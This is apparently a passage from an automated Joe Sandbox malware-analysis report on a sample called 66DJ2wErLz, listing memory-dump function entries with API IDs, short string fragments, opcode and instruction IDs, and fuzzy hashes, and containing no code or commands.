                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2838c07cfca04fbe2cabb14719c9c0661598261e54099377b9e0bd013184ce3a
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 68A1C0B4508B818FD326CF69C490A22BFE1EF57300B1996ADC4D25F7A6D339E806CB55
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2375085451.00000000009E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009E0000, based on PE: false
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_9e0000_66DJ2wErLz.jbxd
                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Uninitialize
                                                                                                                                                                                                                                                      • String ID: PT
                                                                                                                                                                                                                                                      • API String ID: 3861434553-4135314810
                                                                                                                                                                                                                                                      • Opcode ID: 2838c07cfca04fbe2cabb14719c9c0661598261e54099377b9e0bd013184ce3a
                                                                                                                                                                                                                                                      • Instruction ID: 4d51ba3112f8e8db33b4417310c9877cc5f5f3f15dba2e73ddfe9da907308c14
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2838c07cfca04fbe2cabb14719c9c0661598261e54099377b9e0bd013184ce3a
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 96A1BFB45087818FD726CF2AC4A0A62BFE1EF57300B19969CC5E24FB66D339D846CB15
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2374816093.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2374816093.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_66DJ2wErLz.jbxd
                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                      • String ID: "*B$B*B
                                                                                                                                                                                                                                                      • API String ID: 0-3938277345
                                                                                                                                                                                                                                                      • Opcode ID: ca0737ad3b4449c2b88f5e3ab455cb045f7dc09c4e14c18ef94007a83bd96a02
                                                                                                                                                                                                                                                      • Instruction ID: c0ff169c622c87bee100c6609ea31c9af3570951461718032b7520edbb3c94ef
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ca0737ad3b4449c2b88f5e3ab455cb045f7dc09c4e14c18ef94007a83bd96a02
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 53421276A00211DFCB18CF68DC90AAEB7B2FF49310F598179E905AB395D734AD11CB84
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2374816093.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2374816093.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_66DJ2wErLz.jbxd
                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                      • String ID: .$kl
                                                                                                                                                                                                                                                      • API String ID: 0-2631956018
                                                                                                                                                                                                                                                      • Opcode ID: d144eace9ea77f902bcb9140e81b2a0528f571a57748096d515ff42ca28c8b60
                                                                                                                                                                                                                                                      • Instruction ID: 6e525d0f0299ed0e456b3adafb39e2bcab09d4ef44449d93680b2b5d8b67f0fb
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: d144eace9ea77f902bcb9140e81b2a0528f571a57748096d515ff42ca28c8b60
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1FE1173A218709CBCB189F78EC5127A73F1FF4A741F4A887DD8818B2A1E7B99950C714
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2374816093.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2374816093.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_66DJ2wErLz.jbxd
                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                      • String ID: BE$de
                                                                                                                                                                                                                                                      • API String ID: 0-1272349043
                                                                                                                                                                                                                                                      • Opcode ID: 4d61e13fd748368ac6030c890ff82cb0220032c3e56c3c983d389722b1fc0e45
                                                                                                                                                                                                                                                      • Instruction ID: 2d7de7b673e5cb152189fb1770f850f450cdad5ace7171a4f245c8b9200c7c18
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 4d61e13fd748368ac6030c890ff82cb0220032c3e56c3c983d389722b1fc0e45
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2BD1057264C3544BD728DF2888516AFBBE2AFC2304F19492DE8D1AB391D678C916C787
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2375085451.00000000009E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009E0000, based on PE: false
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_9e0000_66DJ2wErLz.jbxd
                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                      • String ID: BE$de
                                                                                                                                                                                                                                                      • API String ID: 0-1272349043
                                                                                                                                                                                                                                                      • Opcode ID: 4d61e13fd748368ac6030c890ff82cb0220032c3e56c3c983d389722b1fc0e45
                                                                                                                                                                                                                                                      • Instruction ID: c87b0450976c4d05115ff5d8058ece15b2166c1d0242fae09a0cd9b3b3661605
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 4d61e13fd748368ac6030c890ff82cb0220032c3e56c3c983d389722b1fc0e45
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 03D1277164C3A48BD329DF2988516AFFBE6ABC2304F18492CE8D19B395D674DD06C782
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2375085451.00000000009E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009E0000, based on PE: false
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_9e0000_66DJ2wErLz.jbxd
                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                      • String ID: )$IEND
                                                                                                                                                                                                                                                      • API String ID: 0-707183367
                                                                                                                                                                                                                                                      • Opcode ID: 77fecbe1ae68033b4a8663d8c056a40f5f9b3b2dca52a2b3e7224ada374ec122
                                                                                                                                                                                                                                                      • Instruction ID: a290c56634eccfeb8cdb0bcdb61a595c2303b35cd1313a493016608641e014f6
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 77fecbe1ae68033b4a8663d8c056a40f5f9b3b2dca52a2b3e7224ada374ec122
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 33D1BDB19083849FE721CF19C841B9BBBE4AF94704F14892DF9999B381D775ED08CB92
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2374816093.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2374816093.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_66DJ2wErLz.jbxd
                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                      • String ID: +oQ$?{;}
                                                                                                                                                                                                                                                      • API String ID: 0-1414831546
                                                                                                                                                                                                                                                      • Opcode ID: 1ee29228f1a6319e217c168091de010b371413e67c26b3c1ec204d280338f3ea
                                                                                                                                                                                                                                                      • Instruction ID: f7e0cf01948a060ca3ae4ae96257901d3d9473cfc3be429b8585dccf822635a3
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 1ee29228f1a6319e217c168091de010b371413e67c26b3c1ec204d280338f3ea
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: BCB1BFB4E043189FEB20DF68D942B9EBBB0FB45304F1081ADE158AB381D7758946CF96
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2374816093.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2374816093.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_66DJ2wErLz.jbxd
                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                      • String ID: Fg$RU]l
                                                                                                                                                                                                                                                      • API String ID: 0-3680832515
                                                                                                                                                                                                                                                      • Opcode ID: 2cdefad0313fa6e4cc5bdb883f2834b1e6d918137519908ea04b1d30e5e067f0
                                                                                                                                                                                                                                                      • Instruction ID: 6f8db59bce85ef316af4e5eced37d01641f7d5c841364d3efc2c21db6cf2a903
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2cdefad0313fa6e4cc5bdb883f2834b1e6d918137519908ea04b1d30e5e067f0
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2171087120D3808BE7398F25D8A57EB7BD2EBD2304F58996DC0C987392DB78440ACB56
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2375085451.00000000009E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009E0000, based on PE: false
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_9e0000_66DJ2wErLz.jbxd
                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                      • String ID: Fg$RU]l
                                                                                                                                                                                                                                                      • API String ID: 0-3680832515
                                                                                                                                                                                                                                                      • Opcode ID: 212695677cf782d22b69bcc5005693ffe3c19f735568b368facab7bd000f874a
                                                                                                                                                                                                                                                      • Instruction ID: a2be6f353a64913d681e9cf5514209f65821f4a622c98dc93d0ea929b6ffe172
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 212695677cf782d22b69bcc5005693ffe3c19f735568b368facab7bd000f874a
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: B771E57121D3C08BE7798F25D8617EABBD3EBD2318F18896DD0D947292DB39440ACB12
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2374816093.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2374816093.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_66DJ2wErLz.jbxd
                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                      • String ID: O28+$h
                                                                                                                                                                                                                                                      • API String ID: 0-657163135
                                                                                                                                                                                                                                                      • Opcode ID: 8dd85ae810d5b5fecc68ec4464ee5e33d050158683b23acf0f2d06bcda51bc6b
                                                                                                                                                                                                                                                      • Instruction ID: 943cae955c8ebe7c4b26d457fd1afafbf5e793f4316e69c7cecf830d1c43eab0
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 8dd85ae810d5b5fecc68ec4464ee5e33d050158683b23acf0f2d06bcda51bc6b
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: B561BE32B887258BD3149A38A8901B7F791EB55350F88473EDD96873C2E63C9D09C3DA
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2374816093.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2374816093.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_66DJ2wErLz.jbxd
                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: InitializeThunk
                                                                                                                                                                                                                                                      • String ID: @$ihgf
                                                                                                                                                                                                                                                      • API String ID: 2994545307-73152791
                                                                                                                                                                                                                                                      • Opcode ID: b76e2e665ab3f88f5f7ecfe080de7e118712eda281a429bd95dd341074e0adb8
                                                                                                                                                                                                                                                      • Instruction ID: cc847ee4b474d0efd8a0440ac8e8375c275344d67ffd0b73ceeb6cce142f8bff
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b76e2e665ab3f88f5f7ecfe080de7e118712eda281a429bd95dd341074e0adb8
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6D413AB1A043018BD714CF24D89277BB7A1FFCA318F14952DD489AB391E739E915C78A
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2375085451.00000000009E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009E0000, based on PE: false
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_9e0000_66DJ2wErLz.jbxd
                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                      • String ID: @$ihgf
                                                                                                                                                                                                                                                      • API String ID: 0-73152791
                                                                                                                                                                                                                                                      • Opcode ID: f9d2302128f83c98de01ee7664bc871aec8e86cdf99c8f751253d6371e8ab131
                                                                                                                                                                                                                                                      • Instruction ID: c8fab9ecb3e786d7bd67927cb206dbb2cde34ac5c05d2f60323e7ec3d1557ccb
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: f9d2302128f83c98de01ee7664bc871aec8e86cdf99c8f751253d6371e8ab131
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 364102B1A043119BD714CF24C8427BBBBA2FFD2328F14862CE4999B2D1E7359955CB86
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2375085451.00000000009E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009E0000, based on PE: false
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_9e0000_66DJ2wErLz.jbxd
                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                      • String ID: Z\$^P
                                                                                                                                                                                                                                                      • API String ID: 0-3724859648
                                                                                                                                                                                                                                                      • Opcode ID: 4f7f96cc206f4a51d8ad8bab145ebd28e0a9ebd1b083b1ab060fd53171580dc2
                                                                                                                                                                                                                                                      • Instruction ID: 678043c0faa5b4ce8298a0f9adb53e879b8fe7b6148c0b789357b65488d2f861
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 4f7f96cc206f4a51d8ad8bab145ebd28e0a9ebd1b083b1ab060fd53171580dc2
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: EF41C0B1911A00CFC718CF28C892A72B7B2FF99314B16859CD5A68F7A5E738E811CB55
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2374816093.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2374816093.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_66DJ2wErLz.jbxd
                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                      • String ID: AzB$`rB
                                                                                                                                                                                                                                                      • API String ID: 0-365317308
                                                                                                                                                                                                                                                      • Opcode ID: 7d44a20d46df19d3b9013d5ff9cf62f4e3051a7763f9fbf866a5162179f586f0
                                                                                                                                                                                                                                                      • Instruction ID: 6eccde100400f429e4c459893b2eae1b4256d2ec662aaeb68cc10dd30f14b8df
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 7d44a20d46df19d3b9013d5ff9cf62f4e3051a7763f9fbf866a5162179f586f0
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 44118BB960C3919FC3049F29D59011BFBE0ABD5708F54DA6CE8C96B312D338DA018B8A
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2374816093.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2374816093.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_66DJ2wErLz.jbxd
                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                      • String ID: AzB$`rB
                                                                                                                                                                                                                                                      • API String ID: 0-365317308
                                                                                                                                                                                                                                                      • Opcode ID: d52ee1f8136c3b98c0a9c934921d80b1beb3214e8eb7b5d6a7a040de55795b14
                                                                                                                                                                                                                                                      • Instruction ID: f6425de8d121e4265380cb8b8556ee32d0ff2cc323f56d540e3951a84df8493e
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: d52ee1f8136c3b98c0a9c934921d80b1beb3214e8eb7b5d6a7a040de55795b14
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 810169B520D3919FC3049F29D59011BFBE0BBD5708F549A6CE8C96B312D334DA418B4A
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2374816093.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2374816093.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_66DJ2wErLz.jbxd
                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                      • String ID: c$
                                                                                                                                                                                                                                                      • API String ID: 0-2516980088
                                                                                                                                                                                                                                                      • Opcode ID: d3ebbaef30565196f274c8e89b57c4db92bba8447b693202f34b7e37aa6ab2c1
                                                                                                                                                                                                                                                      • Instruction ID: 8ddf10d90ef0e2d4ef8b1445a283de62437e0b874c2761f734db7318cd05b52d
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: d3ebbaef30565196f274c8e89b57c4db92bba8447b693202f34b7e37aa6ab2c1
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2F6205742087418FD7258F28C8907A7BBF2FF5A310F19866DD4964B792D338E846CB58
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2374816093.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2374816093.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_66DJ2wErLz.jbxd
                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: InitializeThunk
                                                                                                                                                                                                                                                      • String ID: f
                                                                                                                                                                                                                                                      • API String ID: 2994545307-1993550816
                                                                                                                                                                                                                                                      • Opcode ID: b46a8015aa8989e18fcfc994abe159656f3f5075906cadacb80bce7823f6c0cd
                                                                                                                                                                                                                                                      • Instruction ID: c6061003a35e321c419c30bd02a3c4e1c0b56f4f8cbc670ef9e4360bbe252bef
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b46a8015aa8989e18fcfc994abe159656f3f5075906cadacb80bce7823f6c0cd
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7722EF756083518FD718CF25C880A2BBBE2BBC9314F199A2DE4D587391DBB4EC06CB46
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2375085451.00000000009E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009E0000, based on PE: false
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_9e0000_66DJ2wErLz.jbxd
                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                      • String ID: f
                                                                                                                                                                                                                                                      • API String ID: 0-1993550816
                                                                                                                                                                                                                                                      • Opcode ID: 63a83f5a27331d9fe3a04257bda5fcaf30bc217a6dc898aca3077588f1bd9e28
                                                                                                                                                                                                                                                      • Instruction ID: c0c4efd9f0bebb29a5b50cd50cb10c38e0ae1beae6bdc0204a9579c7133f28f7
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 63a83f5a27331d9fe3a04257bda5fcaf30bc217a6dc898aca3077588f1bd9e28
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3122EF756093519FD718CF25C890BABBBE2BBD9314F188A2CE4D587391DB70D845CB82
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2374816093.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2374816093.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_66DJ2wErLz.jbxd
                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                      • String ID: A67H
                                                                                                                                                                                                                                                      • API String ID: 0-3389657328
                                                                                                                                                                                                                                                      • Opcode ID: 8cecec2cc2e6e176e845aa1397af3039d5d67745fd03e8a435e279ebfdfa12b2
                                                                                                                                                                                                                                                      • Instruction ID: 0278bb419d5cbe6ad6e5f6493e2644ba58dfc9cb1efb87832400374d385c740d
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 8cecec2cc2e6e176e845aa1397af3039d5d67745fd03e8a435e279ebfdfa12b2
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A81225B4604601DFC724CF28D891767B7E2FF5A314F15892DE4AA87792D738E882CB58
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2375085451.00000000009E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009E0000, based on PE: false
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_9e0000_66DJ2wErLz.jbxd
                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                      • String ID: [
                                                                                                                                                                                                                                                      • API String ID: 0-3878419350
                                                                                                                                                                                                                                                      • Opcode ID: 5eb09604ed9747dca5d4520930199d487a8f62beec0cfa78d34f9f01c84922a2
                                                                                                                                                                                                                                                      • Instruction ID: 3ba15d3d731f0ce5fd7ecce9488d1219acc4619bb8b880893d76ac50334f05f7
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5eb09604ed9747dca5d4520930199d487a8f62beec0cfa78d34f9f01c84922a2
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 28021075600702CBCB24CF29C8D1772B7F2FF96314B19859CC9864BBA5EB39A852CB50
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2374816093.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2374816093.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_66DJ2wErLz.jbxd
                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: InitializeThunk
                                                                                                                                                                                                                                                      • String ID: ,)*k
                                                                                                                                                                                                                                                      • API String ID: 2994545307-1228391949
                                                                                                                                                                                                                                                      • Opcode ID: ee2511f57d07ddc5dcb30b837298e4dd3a8f37d85f1e3bd68ab8ff00062e0fa2
                                                                                                                                                                                                                                                      • Instruction ID: bb41e8b13f176b197a8e10d4dde50fa6e0ce8ca76c9034d38a3517968bb0ad29
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ee2511f57d07ddc5dcb30b837298e4dd3a8f37d85f1e3bd68ab8ff00062e0fa2
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: F4C15A75A083116FD724DF21D881A2BB7E2ABDE704F16AA2EE5C553781D638DC04C78A
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2375085451.00000000009E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009E0000, based on PE: false
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_9e0000_66DJ2wErLz.jbxd
                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                      • String ID: ,)*k
                                                                                                                                                                                                                                                      • API String ID: 0-1228391949
                                                                                                                                                                                                                                                      • Opcode ID: 81a23c36fe8827921ec37ff3d571e3748504ad247d1e8451f876af876380c648
                                                                                                                                                                                                                                                      • Instruction ID: 8790a695e530c9fec18553f058e4729808de0e3ccd4659f84dfdacce7810fc96
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 81a23c36fe8827921ec37ff3d571e3748504ad247d1e8451f876af876380c648
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: ADC16775A0C3505BD324DF60C890ABFBBF2ABD6700F18AA2CE58593691D731DC81C782
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2374816093.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2374816093.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
